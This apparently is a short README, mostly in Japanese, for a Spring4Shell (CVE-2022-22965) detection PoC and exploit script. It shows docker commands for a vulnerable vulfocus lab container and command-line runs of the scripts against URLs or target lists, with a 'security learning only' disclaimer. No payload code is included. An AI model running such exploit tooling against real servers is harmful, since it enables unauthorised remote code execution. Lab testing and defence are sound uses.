
Spring-0day/CVE-2022-22965
Spring Framework/CVE-2022-22965
脆弱性ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -dit -p 8080:8080 vulfocus/spring-core-rce-2022-03-29

ターゲットの検出にはPOCの使用をお勧めします。その利点は、DNSLOGに基づいて脆弱性が存在するかどうかを検証でき、tomcatのログ設定を変更しないことです。
python3 cve-2022-22965-poc.py -url https://example.com/
python3 cve-2022-22965-poc.py -file file.txt

python3 cve-2022-22965.py -url https://example.com/
python3 cve-2022-22965.py -file file.txt

python3 cve-2022-22965-poc.py -url https://example.com/

python3 cve-2022-22965.py -url http://example.com/

13行目に一般的なルートを追加してください
routs = ['env',]
12行目に一般的なパスを追加してください
path = ['root',]

安全な学習専用です。不正に使用しないでください
仅用安全学习,请勿非法使用